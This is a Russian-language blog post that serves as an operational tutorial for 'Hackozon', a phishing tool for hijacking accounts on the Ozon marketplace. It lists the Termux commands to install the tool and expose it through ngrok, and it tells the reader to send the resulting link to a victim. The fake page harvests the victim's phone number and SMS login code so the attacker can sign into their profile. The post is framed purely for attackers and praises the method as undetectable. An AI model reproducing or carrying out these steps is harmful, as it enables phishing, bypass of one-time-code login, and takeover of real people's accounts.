Найти в Дзене
Иван Мирный

Hackozon

1 мин
Утилита для получения доступа к профилям Озон. Работает как фишинг, но работает без палебно.   Для работы с ним нам необходимо иметь: PHP PYTHON |_Requests NGROK  У кого их нет - пишем: pkg install php pkg install python pip install requests git clone https://github.com/tchelospy/termux-ngrok cd termux-ngrok ./termux-ngrok.sh Теперь у нас есть необходимости и можно приступать к установке самой утилиты: git clone https://github.com/termux-lab/hackozon.git cd hackozon python3 hackozon.py Затем пишем необходимый порт.  Например: 8080 2000 3000 3333 и т.п  Жмём Enter и видим как запускается сервер.  Далее открываем новую сессию и запускаем ngrok.  ngrok http 8080 Вместо 8080 пишем тот порт который указали при запуске сервера в первой сессии. Если вы там указали 8080, то указываем и в Ngrok.  Далее копируем ссылку с протоколом HTTPS.  Это и будет ссылка которую необходимо скинуть жертве.  Перейдя к первой сессии мы сможем наблюдать за запросами.  За ранее открываем веб версию Озона и жмё

Утилита для получения доступа к профилям Озон.

Работает как фишинг, но работает без палебно. 

 Для работы с ним нам необходимо иметь:

PHP

PYTHON

|_Requests

NGROK 

У кого их нет - пишем:

pkg install php

pkg install python

pip install requests

git clone https://github.com/tchelospy/termux-ngrok

cd termux-ngrok

./termux-ngrok.sh

Теперь у нас есть необходимости и можно приступать к установке самой утилиты:

git clone https://github.com/termux-lab/hackozon.git

cd hackozon

python3 hackozon.py

Затем пишем необходимый порт. 

Например:

8080

2000

3000

3333

и т.п 

Жмём Enter и видим как запускается сервер. 

Далее открываем новую сессию и запускаем ngrok. 

ngrok http 8080

Вместо 8080 пишем тот порт который указали при запуске сервера в первой сессии. Если вы там указали 8080, то указываем и в Ngrok. 

Далее копируем ссылку с протоколом HTTPS. 

Это и будет ссылка которую необходимо скинуть жертве. 

Перейдя к первой сессии мы сможем наблюдать за запросами. 

За ранее открываем веб версию Озона и жмём войти. Наблюдая за запросами в первой сессии, у нас появится номер телефона жертвы и код. 

Копируем номер и вводим в поле авторизации и жмём войти. Затем когда нас попросят ввести код, мы вводим код который так же был получен в первой сессии после номера телефона. 

Вводим код и мы в профиле жертвы. 

Это мы рассмотрели со стороны атакующего. А что же на стороне жертвы произошло?

После того как жертва перешла по ссылке, его попросят подтвердить, что пользователь не является роботом и ввести номер телефона. После того как жертва напишет номер телефона, ему необходимо будет ввести код который придет ему как СМС и только тогда пользователь подтвердит, что не является роботом + не заметит как как-то другой по ту сторону сайта получил эти данные и оказался у него в профиле. По описанию это чуть кажется сложнее, но на практике это легче лёгкого.